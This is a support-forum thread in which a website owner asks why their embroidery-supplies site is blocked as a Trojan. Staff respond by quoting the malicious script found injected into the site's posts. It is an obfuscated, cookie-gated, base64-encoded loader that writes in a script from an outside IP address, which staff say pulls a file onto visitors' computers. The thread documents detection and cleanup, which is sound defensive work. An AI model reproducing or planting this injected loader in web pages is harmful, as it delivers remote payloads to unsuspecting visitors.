Jump to content

Blocked website because of (unspecified) Trojan


BenoitCHOPLIN
Go to solution Solved by Dashke,

Recommended Posts

Helo,

Our website seems to be wrongly blocked by your realtime website scan engine, despite a clean report on virustotal  and with immunifyAV on our hosted server, as well as various online website scanning tools. Blocking is not immediate and happens after about 1 hour  of surfing. It was reported by one customer (only, so far) and we managed to reproduce it on our own computers.

Here is the information :

URL : https://www.creatricesbroderiemachine.com/

Server IP : 85.236.155.161

Malwarebytes Screenshots attached as well as report

MB_screenshot2.png

MB_screenshot3.png

MB_screenshot4.png

MB_screenshot1.png

mb.txt

Link to post
Share on other sites

  • Staff
  • Solution

Please check your website for a suspicious code -

<p>  <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs="></script><script src="./3 façons créatives d’utiliser des restes de tissu et broder durablement – Le mag CBM_files/5cw2fk"></script> <!--/codes_iframe--></p>

 

Link to post
Share on other sites

  • Staff
9 minutes ago, BenoitCHOPLIN said:

OK. I cleaned  up all the posts with the malicious code and checked all potential other locations. Everything should be fine now.

BTW : do you have any idea of what this code was actually doing ?

It would pull a file from

http://185.156.177.85/5cw2fk

on customer's computer. Thanks, the block will be removed soon. :)

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.